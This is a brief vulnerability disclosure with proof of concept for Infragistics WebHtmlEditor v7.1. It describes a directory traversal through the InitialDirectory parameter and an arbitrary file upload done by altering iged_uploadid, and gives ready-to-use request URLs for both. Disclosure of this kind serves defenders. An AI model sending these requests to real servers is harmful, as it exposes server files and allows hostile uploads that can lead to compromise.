50 lines
No EOL
1.6 KiB
Text
50 lines
No EOL
1.6 KiB
Text
-----------------------------------------------------------------------------------------------------------------------------
|
|
Infragistics WebHtmlEditor.v7.1(InitialDirectory,iged_uploadid ) directory Traversal and Arbitrary File upload vulnerability
|
|
-----------------------------------------------------------------------------------------------------------------------------
|
|
|
|
|
|
proof of concept by KyoungChip, Jang ( SpeeDr00t )
|
|
|
|
[*] the bug
|
|
: directory Traversal and Arbitrary File upload vulnerability
|
|
|
|
[*] application
|
|
: Infragistics WebHtmlEditor.v7.1
|
|
|
|
[*] Vendor URL
|
|
: http://www.infragistics.com
|
|
|
|
|
|
[*] homepage
|
|
: cafe.naver.com/cwithme
|
|
|
|
[*] company
|
|
: sk юн4sec
|
|
|
|
[*] Group
|
|
: canvasTeam@SpeeDr00t
|
|
|
|
[*] Thank for
|
|
: my wife(en hee) , my son(ju en, do en ), Zero-0x77, hoon
|
|
|
|
|
|
# directory Traversal vulnerability
|
|
|
|
A directory traversal vulnerability exists in Infragistics WebHtmlEditor.v7.1
|
|
which allows a remote user to view files local to the target server.
|
|
|
|
The parameters of the InitialDirectory ( InitialDirectory =../../ )
|
|
This form of attack can be manipulated directory travel.
|
|
|
|
poc ) InitialDirectory = ../../
|
|
|
|
ex)
|
|
http://server/test.aspx?lang=&iged_uploadid=InsertImage&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor
|
|
|
|
|
|
# Arbitrary File upload vulnerability
|
|
The parameters of the InsertImage the iged_uploadid can upload image files, but
|
|
Open an attacker to change the parameters iged_uploadid Arbitrary File upload it enables.
|
|
|
|
|
|
http://server/test.aspx?lang=&iged_uploadid=Open&LocalizationType=English&LocalizationFile=&InitialDirectory=../../&num=1&parentId=WebHtmlEditor |